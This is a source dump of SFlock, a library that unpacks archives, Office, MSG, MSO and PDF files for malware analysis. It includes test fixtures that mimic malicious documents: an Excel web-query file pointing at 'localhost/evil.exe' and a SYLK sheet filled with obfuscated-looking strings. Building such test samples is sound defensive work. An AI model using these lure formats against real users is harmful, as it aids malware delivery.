62 |             entries.append(File(
63 |                 relapath=filename or "att1", contents=payload
64 |             ))
65 | 
66 |         return entries
67 | 
68 |     def unpack(self, depth=0, password=None, duplicates=None):
69 |         re_compile_orig = re.compile
70 | 
71 |         try:
72 |             entries = self.real_unpack(password, duplicates)
73 |         finally:
74 |             re.compile = re_compile_orig
75 | 
76 |         return self.process(entries, duplicates, depth)
77 | 


--------------------------------------------------------------------------------
/sflock/unpack/msg.py:
--------------------------------------------------------------------------------
 1 | # Copyright (C) 2016-2018 Jurriaan Bremer.
 2 | # This file is part of SFlock - http://www.sflock.org/.
 3 | # See the file 'docs/LICENSE.txt' for copying permission.
 4 | 
 5 | from sflock.abstracts import Unpacker, File
 6 | from sflock.errors import Errors
 7 | 
 8 | class MsgFile(Unpacker):
 9 |     name = "msgfile"
10 |     exts = ".msg"
11 | 
12 |     def supported(self):
13 |         return True
14 | 
15 |     def handles(self):
16 |         if super(MsgFile, self).handles():
17 |             return True
18 | 
19 |         if self.f.ole:
20 |             for filename in self.f.ole.listdir():
21 |                 if filename[0].startswith("__attach"):
22 |                     return True
23 |         return False
24 | 
25 |     def get_stream(self, *filename):
26 |         if self.f.ole.exists("/".join(filename)):
27 |             return self.f.ole.openstream("/".join(filename)).read()
28 | 
29 |     def get_string(self, *filename):
30 |         ascii_filename = "%s001E" % "/".join(filename)
31 |         unicode_filename = "%s001F" % "/".join(filename)
32 | 
33 |         # If available, the unicode stream takes precedence.
34 |         stream = self.get_stream(unicode_filename)
35 |         if stream:
36 |             return stream.decode("utf16")
37 |         return self.get_stream(ascii_filename).decode()
38 | 
39 |     def get_attachment(self, dirname):
40 |         filename = (
41 |             self.get_string(dirname, "__substg1.0_3707") or
42 |             self.get_string(dirname, "__substg1.0_3704") or
43 |             "att1"
44 |         )
45 |         contents = self.get_stream(dirname, "__substg1.0_37010102")
46 |         return filename, contents
47 | 
48 |     def unpack(self, depth=0, password=None, duplicates=None):
49 |         seen, entries = [], []
50 | 
51 |         if not self.f.ole:
52 |             self.f.set_error(Errors.UNPACK_FAILED, "No OLE structure found")
53 |             return []
54 | 
55 |         for dirname in self.f.ole.listdir():
56 |             if dirname[0].startswith("__attach") and dirname[0] not in seen:
57 |                 filename, contents = self.get_attachment(dirname[0])
58 |                 entries.append(File(
59 |                     relapath=filename, contents=contents
60 |                 ))
61 |                 seen.append(dirname[0])
62 | 
63 |         return self.process(entries, duplicates, depth)
64 | 


--------------------------------------------------------------------------------
/sflock/unpack/mso.py:
--------------------------------------------------------------------------------
 1 | # Copyright (C) 2016-2018 Jurriaan Bremer.
 2 | # This file is part of SFlock - http://www.sflock.org/.
 3 | # See the file 'docs/LICENSE.txt' for copying permission.
 4 | 
 5 | import os.path
 6 | import struct
 7 | import zlib
 8 | 
 9 | from sflock.abstracts import Unpacker, File
10 | from sflock.errors import Errors
11 | from sflock.exception import UnpackException
12 | 
13 | class MsoFile(Unpacker):
14 |     name = "msofile"
15 |     exts = ".mso"
16 | 
17 |     def supported(self):
18 |         return True
19 | 
20 |     def get_stream(self, ole, *filename):
21 |         if ole.exists(os.path.join(*filename)):
22 |             return ole.openstream(os.path.join(*filename)).read()
23 | 
24 |     def locate_ole(self, contents):
25 |         for idx in range(1024):
26 |             try:
27 |                 obj = zlib.decompress(contents[idx:])
28 |                 break
29 |             except:
30 |                 pass
31 |         else:
32 |             raise UnpackException("GZIP stream not found")
33 | 
34 |         f = File(contents=obj)
35 |         f.raise_no_ole("No OLE file found in MSO")
36 |         return f.ole
37 | 
38 |     def walk_stream(self, ole, name):
39 |         try:
40 |             ole = self.locate_ole(self.get_stream(ole, name))
41 |         except UnpackException:
42 |             return
43 | 
44 |         self.walk_ole(ole)
45 | 
46 |     def parse_ole10_native(self, ole, name):
47 |         def parse_string(off):
48 |             ret = stream[off:stream.find(b"\x00", off)].decode()
49 |             return off + len(ret) + 1, ret
50 | 
51 |         stream = self.get_stream(ole, "\x01Ole10Native")
52 |         off, filename = parse_string(6)
53 |         off, filepath = parse_string(off)
54 |         off, tempname = parse_string(off + 8)
55 |         embed = struct.unpack("I", stream[off:off+4])[0]
56 |         self.entries.append(File(
57 |             relapath=filename,
58 |             contents=stream[off+4:off+4+embed],
59 |             selected=False
60 |         ))
61 | 
62 |     def walk_ole(self, ole):
63 |         for dirname in ole.listdir():
64 |             if dirname == ["\x01Ole10Native"]:
65 |                 self.parse_ole10_native(ole, dirname[0])
66 |                 continue
67 | 
68 |             self.walk_stream(ole, dirname[0])
69 | 
70 |     def unpack(self, depth=0, password=None, duplicates=None):
71 |         self.entries = []
72 | 
73 |         try:
74 |             self.walk_ole(self.locate_ole(self.f.contents))
75 |         except UnpackException as e:
76 |             self.f.set_error(Errors.UNPACK_FAILED, str(e))
77 | 
78 |         if not self.entries:
79 |             return []
80 | 
81 |         return self.process(self.entries, duplicates, depth)
82 | 


--------------------------------------------------------------------------------
/sflock/unpack/office.py:
--------------------------------------------------------------------------------
 1 | # Copyright (C) 2017-2018 Jurriaan Bremer.
 2 | # This file is part of SFlock - http://www.sflock.org/.
 3 | # See the file 'docs/LICENSE.txt' for copying permission.
 4 | 
 5 | from sflock.abstracts import Unpacker
 6 | from sflock.decode import plugins
 7 | 
 8 | class OfficeFile(Unpacker):
 9 |     name = "office"
10 |     package = "doc", "xls", "ppt"
11 |     magic = ["Composite Document File", "CDFV2 Encrypted"]
12 | 
13 |     def supported(self):
14 |         return True
15 | 
16 |     def decrypt(self, password):
17 |         if password is None:
18 |             return
19 | 
20 |         return plugins["office"](self.f, password).decode()
21 | 
22 |     def unpack(self, depth=0, password=None, duplicates=None):
23 |         # Avoiding recursive imports. TODO Can this be generalized?
24 |         from sflock import ident
25 | 
26 |         entries = []
27 | 
28 |         f = self.bruteforce(password)
29 |         if f:
30 |             entries.append(f)
31 | 
32 |         ret = self.process(entries, duplicates, depth)
33 |         f and ident(f)
34 |         return ret
35 | 


--------------------------------------------------------------------------------
/sflock/unpack/pdf.py:
--------------------------------------------------------------------------------
 1 | # Copyright (C) 2017-2018 Jurriaan Bremer.
 2 | # Copyright (C) 2018 Hatching B.V.
 3 | # This file is part of SFlock - http://www.sflock.org/.
 4 | # See the file 'docs/LICENSE.txt' for copying permission.
 5 | 
 6 | import os
 7 | 
 8 | import peepdf
 9 | 
10 | from sflock.abstracts import Unpacker, File
11 | from sflock.exception import UnpackException
12 | from sflock.misc import make_list
13 | 
14 | class PdfFile(Unpacker):
15 |     name = "pdffile"
16 |     exts = ".pdf"
17 |     package = "pdf"
18 |     magic = "PDF document"
19 | 
20 |     def supported(self):
21 |         return True
22 | 
23 |     def handles(self):
24 | 
25 |         # Temporarily only use the file magic to detect PDF files, as peepdf
26 |         # can fail with invalid/fake PDFs.
27 |         for magic in make_list(self.magic or []):
28 |             if magic in self.f.magic:
29 |                 return True
30 |         return False
31 | 
32 |     def unpack(self, depth=0, password=None, duplicates=None):
33 |         entries = []
34 | 
35 |         if self.f.filepath:
36 |             filepath = self.f.filepath
37 |             temporary = False
38 |         else:
39 |             filepath = self.f.temp_path()
40 |             temporary = True
41 | 
42 |         p = peepdf.PDFCore.PDFParser()
43 | 
44 |         try:
45 |             _, f = p.parse(
46 |                 filepath, forceMode=True, looseMode=True, manualAnalysis=False
47 |             )
48 |         except Exception as e:
49 |             raise UnpackException(f"peepdf parsing failure: {e}")
50 | 
51 | 
52 |         for version in range(f.updates + 1):
53 |             for obj in f.body[version].objects.values():
54 |                 if not isinstance(obj.object, peepdf.PDFCore.PDFDictionary):
55 |                     continue
56 | 
57 |                 el = obj.object.elements
58 |                 if "/F" not in el and "/UF" not in el:
59 |                     continue
60 |                 if "/EF" not in el:
61 |                     continue
62 | 
63 |                 filename = el.get("/F") or el.get("/UF")
64 |                 if not isinstance(filename, peepdf.PDFCore.PDFString):
65 |                     continue
66 | 
67 |                 ref = el["/EF"]
68 |                 if not isinstance(ref, peepdf.PDFCore.PDFDictionary):
69 |                     continue
70 | 
71 |                 if "/F" not in ref.elements:
72 |                     continue
73 | 
74 |                 ref = ref.elements["/F"]
75 |                 if not isinstance(ref, peepdf.PDFCore.PDFReference):
76 |                     continue
77 | 
78 |                 if ref.id not in f.body[version].objects:
79 |                     continue
80 | 
81 |                 obj = f.body[version].objects[ref.id]
82 |                 contents = obj.object.decodedStream.encode("latin-1")
83 |                 filename = filename.value
84 | 
85 |                 entries.append(File(
86 |                     relapath=filename,
87 |                     contents=contents,
88 |                     filename=filename,
89 |                     selected=False
90 |                 ))
91 | 
92 |         if temporary:
93 |             os.unlink(filepath)
94 | 
95 |         return self.process(entries, duplicates, depth)
96 | 


--------------------------------------------------------------------------------
/sflock/unpack/rar.py:
--------------------------------------------------------------------------------
 1 | # Copyright (C) 2015-2018 Jurriaan Bremer.
 2 | # Copyright (C) 2018 Hatching B.V.
 3 | # This file is part of SFlock - http://www.sflock.org/.
 4 | # See the file 'docs/LICENSE.txt' for copying permission.
 5 | 
 6 | import os
 7 | import tempfile
 8 | 
 9 | from sflock.abstracts import Unpacker
10 | 
11 | class RarFile(Unpacker):
12 |     name = "rarfile"
13 |     exe = "/usr/bin/rar"
14 |     exts = ".rar"
15 |     magic = "RAR archive"
16 |     dependency = "rar"
17 | 
18 |     def handles(self):
19 |         if not super().handles():
20 |             return False
21 | 
22 |         if self.f.magic == "data":
23 |             return False
24 | 
25 |         return True
26 | 
27 |     def decrypt(self, password, archive, entry):
28 |        return self.zipjail(
29 |             archive, entry, "x", "-mt1", "-p%s" % (password or "-"),
30 |             archive, entry
31 |         )
32 | 
33 |     def unpack(self, depth=0, password=None, duplicates=None):
34 |         self.f.archive = True
35 |         dirpath = tempfile.mkdtemp()
36 | 
37 |         if self.f.filepath:
38 |             filepath = self.f.filepath
39 |             temporary = False
40 |         else:
41 |             filepath = self.f.temp_path()
42 |             temporary = True
43 | 
44 |         try:
45 |             ret = self.bruteforce(password, filepath, dirpath)
46 |         finally:
47 |             if temporary:
48 |                 os.unlink(filepath)
49 | 
50 |         if not ret:
51 |             return []
52 | 
53 |         return self.process_directory(dirpath, duplicates, depth, password)
54 | 


--------------------------------------------------------------------------------
/sflock/unpack/tar.py:
--------------------------------------------------------------------------------
  1 | # Copyright (C) 2015-2018 Jurriaan Bremer.
  2 | # Copyright (C) 2018 Hatching B.V.
  3 | # This file is part of SFlock - http://www.sflock.org/.
  4 | # See the file 'docs/LICENSE.txt' for copying permission.
  5 | 
  6 | import bz2
  7 | import gzip
  8 | import os
  9 | import tarfile
 10 | import tempfile
 11 | 
 12 | from sflock.abstracts import Unpacker, File
 13 | from sflock.exception import NotSupportedError
 14 | from sflock.config import MAX_TOTAL_SIZE
 15 | from sflock.errors import Errors
 16 | 
 17 | class TarFile(Unpacker):
 18 |     name = "tarfile"
 19 |     mode = "r:"
 20 |     exts = ".tar"
 21 |     magic = "POSIX tar archive"
 22 | 
 23 |     def supported(self):
 24 |         return True
 25 | 
 26 |     def handles(self):
 27 |         if not super().handles():
 28 |             return False
 29 | 
 30 |         if self.f.magic == "data":
 31 |             return False
 32 | 
 33 |         return True
 34 | 
 35 |     def unpack(self, depth=0, password=None, duplicates=None):
 36 |         self.f.archive = True
 37 |         try:
 38 |             archive = tarfile.open(mode=self.mode, fileobj=self.f.stream)
 39 |         except tarfile.ReadError as e:
 40 |             # Raise not supported instead of setting invalid archive error
 41 |             # as .gzip archives are also recognized as tar.gz files.
 42 |             # this errors tells the unpack caller to try the next
 43 |             # supporting plugin.
 44 |             raise NotSupportedError(f"Invalid tar/tar.gz archive: {e}")
 45 | 
 46 |         entries, total_size = [], 0
 47 |         for entry in archive:
 48 |             # Ignore anything that's not a file for now.
 49 |             if not entry.isfile() or entry.size < 0:
 50 |                 continue
 51 | 
 52 |             # TODO Improve this. Also take precedence for native decompression
 53 |             # utilities over the Python implementation in the future.
 54 |             total_size += entry.size
 55 |             if total_size >= MAX_TOTAL_SIZE:
 56 |                 self.f.set_error(
 57 |                     Errors.TOTAL_TOO_LARGE,
 58 |                     f"Unpacked archive size exceeds: {MAX_TOTAL_SIZE}"
 59 |                 )
 60 |                 return []
 61 | 
 62 |             entries.append(File(
 63 |                 relapath=entry.path,
 64 |                 contents=archive.extractfile(entry).read()
 65 |             ))
 66 | 
 67 |         return self.process(entries, duplicates, depth)
 68 | 
 69 | class TargzFile(TarFile, Unpacker):
 70 |     name = "targzfile"
 71 |     mode = "r:gz"
 72 |     exts = ".tar.gz"
 73 |     magic = "gzip compressed data"
 74 | 
 75 |     def handles(self):
 76 |         if self.f.filename and self.f.filename.lower().endswith(self.exts):
 77 |             return True
 78 | 
 79 |         if not self.f.filesize:
 80 |             return False
 81 | 
 82 |         try:
 83 |             File(contents=gzip.GzipFile(fileobj=self.f.stream).read())
 84 |         except IOError:
 85 |             return False
 86 | 
 87 |         return self.magic in self.f.magic
 88 | 
 89 | class Tarbz2File(TarFile, Unpacker):
 90 |     name = "tarbz2file"
 91 |     mode = "r:bz2"
 92 |     exts = ".tar.bz2"
 93 | 
 94 |     def handles(self):
 95 |         if self.f.filename and self.f.filename.lower().endswith(self.exts):
 96 |             return True
 97 | 
 98 |         if not self.f.filesize:
 99 |             return False
100 | 
101 |         fd, filepath = tempfile.mkstemp()
102 |         os.write(fd, self.f.stream.read(0x1000))
103 |         os.close(fd)
104 | 
105 |         d = bz2.BZ2File(filepath, "r")
106 | 
107 |         try:
108 |             ret = False
109 |             if d.read(0x1000):
110 |                 ret = True
111 |         except (IOError, EOFError):
112 |             pass
113 | 
114 |         d.close()
115 |         os.unlink(filepath)
116 |         return ret
117 | 
118 |     def unpack(self, depth=0, password=None, duplicates=None):
119 |         dirpath = tempfile.mkdtemp()
120 | 
121 |         if not self.f.filepath:
122 |             filepath = self.f.temp_path(".bz2")
123 |             temporary = True
124 |         else:
125 |             filepath = self.f.filepath
126 |             temporary = False
127 | 
128 |         f = open(os.path.join(dirpath, "output"), "wb")
129 |         d = bz2.BZ2File(filepath, "r")
130 | 
131 |         while f.tell() < MAX_TOTAL_SIZE:
132 |             try:
133 |                 buf = d.read(0x10000)
134 |             except (IOError, EOFError):
135 |                 break
136 |             if not buf:
137 |                 break
138 |             f.write(buf)
139 | 
140 |         if temporary:
141 |             os.unlink(filepath)
142 | 
143 |         filesize = f.tell()
144 |         d.close()
145 |         f.close()
146 | 
147 |         if filesize >= MAX_TOTAL_SIZE:
148 |             self.f.set_error(
149 |                 Errors.TOTAL_TOO_LARGE,
150 |                 f"Unpacked archive size exceeds: {MAX_TOTAL_SIZE}"
151 |             )
152 |             return []
153 | 
154 |         return self.process_directory(dirpath, duplicates, depth)
155 | 


--------------------------------------------------------------------------------
/sflock/unpack/zip7.py:
--------------------------------------------------------------------------------
  1 | # Copyright (C) 2015-2018 Jurriaan Bremer.
  2 | # Copyright (C) 2018 Hatching B.V.
  3 | # This file is part of SFlock - http://www.sflock.org/.
  4 | # See the file 'docs/LICENSE.txt' for copying permission.
  5 | 
  6 | import os
  7 | import tempfile
  8 | import zipfile
  9 | 
 10 | from sflock.abstracts import Unpacker
 11 | 
 12 | 
 13 | class Zip7File(Unpacker):
 14 |     name = "7zfile"
 15 |     exe = "/usr/bin/7z"
 16 |     exts = ".7z", ".iso", ".zip"
 17 |     # TODO Should we use "isoparser" (check PyPI) instead of 7z?
 18 |     magic = ("7-zip archive", "ISO 9660", "CDFV2 Encrypted",
 19 |              "Zip archive", "UDF filesystem")
 20 |     priority = 1
 21 |     dependency = "p7zip-full"
 22 | 
 23 |     def handles(self):
 24 |         if not super().handles():
 25 |             return False
 26 | 
 27 |         # If this is a zip file, check if it can actually be parsed by
 28 |         # zipfile. If not, do not handle it.
 29 |         if self.f.stream.read(2) == b"PK":
 30 |             try:
 31 |                 zipfile.ZipFile(self.f.stream)
 32 |                 return True
 33 |             except (zipfile.BadZipFile, IOError):
 34 |                 return False
 35 | 
 36 |         # If the file magic is unknown/data and the given or identified
 37 |         # extension is iso, it can be a UDF image. Try to unpack this.
 38 |         if self.f.magic == "data":
 39 |             if self.f.filename.endswith(".iso"):
 40 |                 return True
 41 | 
 42 |             if self.f.identified and self.f.extension == "iso":
 43 |                 return True
 44 | 
 45 |             return False
 46 | 
 47 |         return True
 48 | 
 49 |     def decrypt(self, password, archive, entry):
 50 |         if password:
 51 |             args = [f"-p{password}"]
 52 |         else:
 53 |             # Empty pass, otherwise it will prompt if there is a pass.
 54 |             args = ["-p"]
 55 | 
 56 |         return self.zipjail(
 57 |             archive, entry, "x", "-mmt=off", "-o%s" % entry, archive, *args
 58 |         )
 59 | 
 60 |     def unpack(self, depth=0, password=None, duplicates=None):
 61 |         self.f.archive = True
 62 |         dirpath = tempfile.mkdtemp()
 63 | 
 64 |         if self.f.filepath:
 65 |             filepath = self.f.filepath
 66 |             temporary = False
 67 |         else:
 68 |             filepath = self.f.temp_path(b".7z")
 69 |             temporary = True
 70 | 
 71 |         try:
 72 |             ret = self.bruteforce(password, filepath, dirpath)
 73 |         finally:
 74 |             if temporary:
 75 |                 os.unlink(filepath)
 76 | 
 77 |         if not ret:
 78 |             return []
 79 | 
 80 |         return self.process_directory(dirpath, duplicates, depth)
 81 | 
 82 | class GzipFile(Unpacker):
 83 |     name = "gzipfile"
 84 |     exe = "/usr/bin/7z"
 85 |     exts = ".gzip"
 86 |     magic = "gzip compressed data, was", "gzip compressed data, from"
 87 |     dependency = "p7zip-full"
 88 | 
 89 |     def unpack(self, depth=0, password=None, duplicates=None):
 90 |         dirpath = tempfile.mkdtemp()
 91 | 
 92 |         if self.f.filepath:
 93 |             filepath = self.f.filepath
 94 |             temporary = False
 95 |         else:
 96 |             filepath = self.f.temp_path(".7z")
 97 |             temporary = True
 98 | 
 99 |         ret = self.zipjail(
100 |             filepath, dirpath, "x", "-o%s" % dirpath, filepath
101 |         )
102 |         if not ret:
103 |             return []
104 | 
105 |         if temporary:
106 |             os.unlink(filepath)
107 | 
108 |         return self.process_directory(dirpath, duplicates, depth)
109 | 
110 | class LzhFile(Unpacker):
111 |     name = "lzhfile"
112 |     exe = "/usr/bin/7z"
113 |     exts = ".lzh", ".lha"
114 |     magic = "LHa "
115 |     dependency = "p7zip-full"
116 | 
117 |     def unpack(self, depth=0, password=None, duplicates=None):
118 |         dirpath = tempfile.mkdtemp()
119 | 
120 |         if self.f.filepath:
121 |             filepath = self.f.filepath
122 |             temporary = False
123 |         else:
124 |             filepath = self.f.temp_path(".7z")
125 |             temporary = True
126 | 
127 |         ret = self.zipjail(
128 |             filepath, dirpath, "x", "-o%s" % dirpath, filepath
129 |         )
130 |         if not ret:
131 |             return []
132 | 
133 |         if temporary:
134 |             os.unlink(filepath)
135 | 
136 |         return self.process_directory(dirpath, duplicates, depth)
137 | 
138 | class VHDFile(Unpacker):
139 |     name = "vhdfile"
140 |     exe = "/usr/bin/7z"
141 |     exts = ".vhd", ".vhdx"
142 |     magic = " Microsoft Disk Image"
143 |     dependency = "p7zip-full"
144 | 
145 |     def unpack(self, depth=0, password=None, duplicates=None):
146 |         dirpath = tempfile.mkdtemp()
147 | 
148 |         if self.f.filepath:
149 |             filepath = self.f.filepath
150 |             temporary = False
151 |         else:
152 |             filepath = self.f.temp_path(".vhd")
153 |             temporary = True
154 | 
155 |         ret = self.zipjail(
156 |             filepath, dirpath, "x", "-xr![SYSTEM]*", "-o%s" % dirpath, filepath
157 |         )
158 | 
159 |         if not ret:
160 |             return []
161 | 
162 |         if temporary:
163 |             os.unlink(filepath)
164 | 
165 |         return self.process_directory(dirpath, duplicates, depth)
166 | 


--------------------------------------------------------------------------------
/tests/files/1.iqy:
--------------------------------------------------------------------------------
 1 | WEB
 2 | 1
 3 | http://localhost/evil.exe
 4 | 2
 5 | a
 6 | 3
 7 | b
 8 | 4
 9 | c
10 | 5


--------------------------------------------------------------------------------
/tests/files/1.slk:
--------------------------------------------------------------------------------
  1 | ID;PWXL;N;E
  2 | P;PGeneral
  3 | P;P0
  4 | P;P0.00
  5 | P;P#,##0
  6 | P;P#,##0.00
  7 | P;P#,##0_);;\(#,##0\)
  8 | P;P#,##0_);;[Red]\(#,##0\)
  9 | P;P#,##0.00_);;\(#,##0.00\)
 10 | P;P#,##0.00_);;[Red]\(#,##0.00\)
 11 | P;P"$"#,##0_);;\("$"#,##0\)
 12 | P;P"$"#,##0_);;[Red]\("$"#,##0\)
 13 | P;P"$"#,##0.00_);;\("$"#,##0.00\)
 14 | P;P"$"#,##0.00_);;[Red]\("$"#,##0.00\)
 15 | P;P0%
 16 | P;P0.00%
 17 | P;P0.00E+00
 18 | P;P##0.0E+0
 19 | P;P#\ ?/?
 20 | P;P#\ ??/??
 21 | P;Pm/d/yyyy
 22 | P;Pd\-mmm\-yy
 23 | P;Pd\-mmm
 24 | P;Pmmm\-yy
 25 | P;Ph:mm\ AM/PM
 26 | P;Ph:mm:ss\ AM/PM
 27 | P;Ph:mm
 28 | P;Ph:mm:ss
 29 | P;Pm/d/yyyy\ h:mm
 30 | P;Pmm:ss
 31 | P;Pmm:ss.0
 32 | P;P@
 33 | P;P[h]:mm:ss
 34 | P;P_("$"* #,##0_);;_("$"* \(#,##0\);;_("$"* "-"_);;_(@_)
 35 | P;P_(* #,##0_);;_(* \(#,##0\);;_(* "-"_);;_(@_)
 36 | P;P_("$"* #,##0.00_);;_("$"* \(#,##0.00\);;_("$"* "-"??_);;_(@_)
 37 | P;P_(* #,##0.00_);;_(* \(#,##0.00\);;_(* "-"??_);;_(@_)
 38 | P;FCalibri;M220;L9
 39 | P;FCalibri;M220;L9
 40 | P;FCalibri;M220;L9
 41 | P;FCalibri;M220;L9
 42 | P;ECalibri;M220;L9
 43 | P;ECalibri Light;M360;L55
 44 | P;ECalibri;M300;SB;L55
 45 | P;ECalibri;M260;SB;L55
 46 | P;ECalibri;M220;SB;L55
 47 | P;ECalibri;M220;L18
 48 | P;ECalibri;M220;L21
 49 | P;ECalibri;M220;L61
 50 | P;ECalibri;M220;L63
 51 | P;ECalibri;M220;SB;L64
 52 | P;ECalibri;M220;SB;L53
 53 | P;ECalibri;M220;L53
 54 | P;ECalibri;M220;SB;L10
 55 | P;ECalibri;M220;L11
 56 | P;ECalibri;M220;SI;L24
 57 | P;ECalibri;M220;SB;L9
 58 | P;ECalibri;M220;L10
 59 | P;ECalibri;M220;L9
 60 | P;ECalibri Light;M360;L55
 61 | P;ECalibri;M300;SB;L55
 62 | P;ECalibri;M260;SB;L55
 63 | P;ECalibri;M220;SB;L55
 64 | P;ECalibri;M220;L18
 65 | P;ECalibri;M220;L21
 66 | P;ECalibri;M220;L61
 67 | P;ECalibri;M220;L63
 68 | P;ECalibri;M220;SB;L64
 69 | P;ECalibri;M220;SB;L53
 70 | P;ECalibri;M220;L53
 71 | P;ECalibri;M220;SB;L10
 72 | P;ECalibri;M220;L11
 73 | P;ECalibri;M220;SI;L24
 74 | P;ECalibri;M220;SB;L9
 75 | P;ECalibri;M220;L10
 76 | P;ECalibri;M220;L9
 77 | P;ECalibri Light;M360;L55
 78 | P;ECalibri;M300;SB;L55
 79 | P;ECalibri;M260;SB;L55
 80 | P;ECalibri;M220;SB;L55
 81 | P;ECalibri;M220;L18
 82 | P;ECalibri;M220;L21
 83 | P;ECalibri;M220;L61
 84 | P;ECalibri;M220;L63
 85 | P;ECalibri;M220;SB;L64
 86 | P;ECalibri;M220;SB;L53
 87 | P;ECalibri;M220;L53
 88 | P;ECalibri;M220;SB;L10
 89 | P;ECalibri;M220;L11
 90 | P;ECalibri;M220;SI;L24
 91 | P;ECalibri;M220;SB;L9
 92 | P;ECalibri;M220;L10
 93 | P;ESegoe UI;M200;L9
 94 | P;ECalibri;M220;L9
 95 | P;ECalibri;M220;SB;L9
 96 | P;ECalibri;M220;L9
 97 | F;P0;DG0G8;M300
 98 | B;Y18;X9;D0 0 17 8
 99 | O;L;D;U;V0;K47;G100 0.001
100 | C;Y1;X1;K"1BzTV4UH+?2q$,BuQ,?=X8.O>Gvi-?8cTY1|{'}0oCX'*g%,o0=)![1"mcaLvLQu,LkMB)-ya2upin\ NFz/q}M#*q-G/F^_3*@LWz'_~{[Wm"*Fj}jwt~&IN"j"aidy$`@?D;;m5 n>_!}Q8~(?hv>{,4C/b87fYy@>OUhDR"xPR.DtKFp,)aY3#W#kp_MeV07mBt#mO>KdV!q9w:Ic@!Qo$s34s`+fg!TC?.h-#0SN2D'_Sv~Yt^cs&C {2(nk"
101 | C;Y2;K"1BzTV4UH+?2q$,BuQ,?=X8.O>Gvi-?8cTY1|{'}0oCX'*g%,o0=)![1"mcaLvLQu,LkMB)-ya2upin\ NFz/q}M#*q-G/F^_3*@LWz'_~{[Wm"*Fj}jwt~&IN"j"aidy$`@?D;;m5 n>_!}Q8~(?hv>{,4C/b87fYy@>OUhDR"xPR.DtKFp,)aY3#W#kp_MeV07mBt#mO>KdV!q9w:Ic@!Qo$s34s`+fg!TC?.h-#0SN2D'_Sv~Yt^cs&C {2(nk"
102 | C;Y3;K"1BzTV4UH+?2q$,BuQ,?=X8.O>Gvi-?8cTY1|{'}0oCX'*g%,o0=)![1"mcaLvLQu,LkMB)-ya2upin\ NFz/q}M#*q-G/F^_3*@LWz'_~{[Wm"*Fj}jwt~&IN"j"aidy$`@?D;;m5 n>_!}Q8~(?hv>{,4C/b87fYy@>OUhDR"xPR.DtKFp,)aY3#W#kp_MeV07mBt#mO>KdV!q9w:Ic@!Qo$s34s`+fg!TC?.h-#0SN2D'_Sv~Yt^cs&C {2(nk"
103 | C;Y4;K"1BzTV4UH+?2q$,BuQ,?=X8.O>Gvi-?8cTY1|{'}0oCX'*g%,o0=)![1"mcaLvLQu,LkMB)-ya2upin\ NFz/q}M#*q-G/F^_3*@LWz'_~{[Wm"*Fj}jwt~&IN"j"aidy$`@?D;;m5 n>_!}Q8~(?hv>{,4C/b87fYy@>OUhDR"xPR.DtKFp,)aY3#W#kp_MeV07mBt#mO>KdV!q9w:Ic@!Qo$s34s`+fg!TC?.h-#0SN2D'_Sv~Yt^cs&C {2(nk"
104 | C;Y5;K"1BzTV4UH+?2q$,BuQ,?=X8.O>Gvi-?8cTY1|{'}0oCX'*g%,o0=)![1"mcaLvLQu,LkMB)-ya2upin\ NFz/q}M#*q-G/F^_3*@LWz'_~{[Wm"*Fj}jwt~&IN"j"aidy$`@?D;;m5 n>_!}Q8~(?hv>{,4C/b87fYy@>OUhDR"xPR.DtKFp,)aY3#W#kp_MeV07mBt#mO>KdV!q9w:Ic@!Qo$s34s`+fg!TC?.h-#0SN2D'_Sv~Yt^cs&C {2(nk"
105 | C;Y6;K"1BzTV4UH+?2q$,BuQ,?=X8.O>Gvi-?8cTY1|{'}0oCX'*g%,o0=)![1"mcaLvLQu,LkMB)-ya2upin\ NFz/q}M#*q-G/F^_3*@LWz'_~{[Wm"*Fj}jwt~&IN"j"aidy$`@?D;;m5 n>_!}Q8~(?hv>{,4C/b87fYy@>OUhDR"xPR.DtKFp,)aY3#W#kp_MeV07mBt#mO>KdV!q9w:Ic@!Qo$s34s`+fg!TC?.h-#0SN2D'_Sv~Yt^cs&C {2(nk"
106 | C;Y7;K"1BzTV4UH+?2q$,BuQ,?=X8.O>Gvi-?8cTY1|{'}0oCX'*g%,o0=)![1"mcaLvLQu,LkMB)-ya2upin\ NFz/q}M#*q-G/F^_3*@LWz'_~{[Wm"*Fj}jwt~&IN"j"aidy$`@?D;;m5 n>_!}Q8~(?hv>{,4C/b87fYy@>OUhDR"xPR.DtKFp,)aY3#W#kp_MeV07mBt#mO>KdV!q9w:Ic@!Qo$s34s`+fg!TC?.h-#0SN2D'_Sv~Yt^cs&C {2(nk"
107 | C;Y8;K"1BzTV4UH+?2q$,BuQ,?=X8.O>Gvi-?8cTY1|{'}0oCX'*g%,o0=)![1"mcaLvLQu,LkMB)-ya2upin\ NFz/q}M#*q-G/F^_3*@LWz'_~{[Wm"*Fj}jwt~&IN"j"aidy$`@?D;;m5 n>_!}Q8~(?hv>{,4C/b87fYy@>OUhDR"xPR.DtKFp,)aY3#W#kp_MeV07mBt#mO>KdV!q9w:Ic@!Qo$s34s`+fg!TC?.h-#0SN2D'_Sv~Yt^cs&C {2(nk"
108 | C;Y9;K"1BzTV4UH+?2q$,BuQ,?=X8.O>Gvi-?8cTY1|{'}0oCX'*g%,o0=)![1"mcaLvLQu,LkMB)-ya2upin\ NFz/q}M#*q-G/F^_3*@LWz'_~{[Wm"*Fj}jwt~&IN"j"aidy$`@?D;;m5 n>_!}Q8~(?hv>{,4C/b87fYy@>OUhDR"xPR.DtKFp,)aY3#W#kp_MeV07mBt#mO>KdV!q9w:Ic@!Qo$s34s`+fg!TC?.h-#0SN2D'_Sv~Yt^cs&C {2(nk"
109 | C;Y10;K"1BzTV4UH+?2q$,BuQ,?=X8.O>Gvi-?8cTY1|{'}0oCX'*g%,o0=)![1"mcaLvLQu,LkMB)-ya2upin\ NFz/q}M#*q-G/F^_3*@LWz'_~{[Wm"*Fj}jwt~&IN"j"aidy$`@?D;;m5 n>_!}Q8~(?hv>{,4C/b87fYy@>OUhDR"xPR.DtKFp,)aY3#W#kp_MeV07mBt#mO>KdV!q9w:Ic@!Qo$s34s`+fg!TC?.h-#0SN2D'_Sv~Yt^cs&C {2(nk"
110 | C;Y11;K"1BzTV4UH+?2q$,BuQ,?=X8.O>Gvi-?8cTY1|{'}0oCX'*g%,o0=)![1"mcaLvLQu,LkMB)-ya2upin\ NFz/q}M#*q-G/F^_3*@LWz'_~{[Wm"*Fj}jwt~&IN"j"aidy$`@?D;;m5 n>_!}Q8~(?hv>{,4C/b87fYy@>OUhDR"xPR.DtKFp,)aY3#W#kp_MeV07mBt#mO>KdV!q9w:Ic@!Qo$s34s`+fg!TC?.h-#0SN2D'_Sv~Yt^cs&C {2(nk"
